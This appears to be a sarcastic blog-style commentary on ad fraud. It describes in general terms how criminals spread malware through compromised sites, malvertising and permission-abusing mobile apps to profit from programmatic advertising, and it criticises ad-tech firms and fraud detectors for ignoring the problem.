Hackers Plant Malware for Fun and Big Profits

Why do hackers hack? Because it’s fun. Why do hackers plant malware on humans’ devices? Because it’s fun and wildly profitable. Now that programmatic ad tech has conveniently set up an highly scalable ecosystem for transferring money from brand marketers’ digital budgets directly into the offshore accounts of mildly skilled cybercriminals, why not take full advantage? After all, the bank vault door is swung wide open and brands deposit $350 billion year after year. Why not just help yourself to some of that bullion?

Hackers don’t need to compromise their own bots; they need to compromise real humans’ smartphones, laptops, computers, and smart devices with malware, so they can command and control them. With a botnet of compromised devices, hackers can make easy money by delivering traffic to sites that pay them for traffic [1]; install apps from marketers that pay them per install (e.g. Uber suing mobile exchanges for fake installs); continuously play hypercasual mobile games that monetize via ads; or click on search ads and attribution urls to make CPC revenues and take credit for affiliate sales, respectively. 

How do hackers get malware on devices? They use tried and true methods, like the following:

Passive Watering Hole Attacks

Hackers’ malicious code is lying in wait for humans to voluntarily go to certain sites -- think piracy and porn sites. After being compromised, humans are too embarrassed to report anything anyway. Over the years, we’ve seen 100’s of thousands of sites built on Wordpress, Joomla, and SquareSpace platforms [2], [3], [4] compromised to plant malware when unsuspecting humans visited. This week, we’ve even seen a faked “corona” map laced with malware. And we haven’t even mentioned malicious third party javascript trackers that “exfil” users’ private info, like logins and passwords [5]. 

Active Malvertising Campaigns

If the need for compromised devices is more urgent, hackers employ proactive malvertising campaigns in which simple display ads laced with malicious code are sent into ad slots on mainstream sites that have large human audiences, think news sites. These typically appear to be pop-up or redirect ads that hijack users and send them to scam tech support or sweepstakes sites. When the user clicks, or tries to close the pop-up, the malware is set. Clean.io published a chart (below) that shows surges in malvertising activity, coinciding with weekends, public holidays, or when humans are working from home and using personal devices that are not as well hardened as their work devices.

Continuous Monitoring Through Mobile Apps

In addition to the passive and active attacks above, hackers can also compromise users and commit ad fraud continuously with mobile apps. Ever heard of the flashlight app that asked for permissions to make and receive calls, send and receive SMS text messages, and turn on and off microphone and camera? Yeah, those and thousands of other keyboard, anti-virus, selfie-camera, cleaner, and free VPN apps have been caught not only for abusing permissions [6] but also continuously loading ads in the background. Mobile devices are the perfect host for such ad fraud malware because they are always on and always connected to the Internet - so it can continuously load ads. Humans may experience their phones running out of battery by mid-morning, or using up their monthly bandwidth by the first week of the month. 

With popular emoji keyboards -- e.g. downloaded 2 billion times -- under their control, hackers can continuously monitor what the user types to collect logins and passwords, all the sites you visit, and every message you exchange with every friend. This is valuable data they sell to adtech companies that want to use it for targeting ads. 

So it all ties, in a nice neat bow. 

Hackers hack and make big money. Adtech companies can sell big traffic, inflated user “engagement” numbers, and data for ad targeting. Fraud detection firms can’t detect this fraud, so they mark everything as “valid.” Marketers show their bosses spreadsheets with big numbers of ads and low CPM prices. And industry trade associations pat themselves on the back because they’re “winning” and they “solved fraud.” 

Shall we at least try to look more closely for fraud and make our digital marketing better? No? Ok. Keep calm and carry on. Don’t mind me.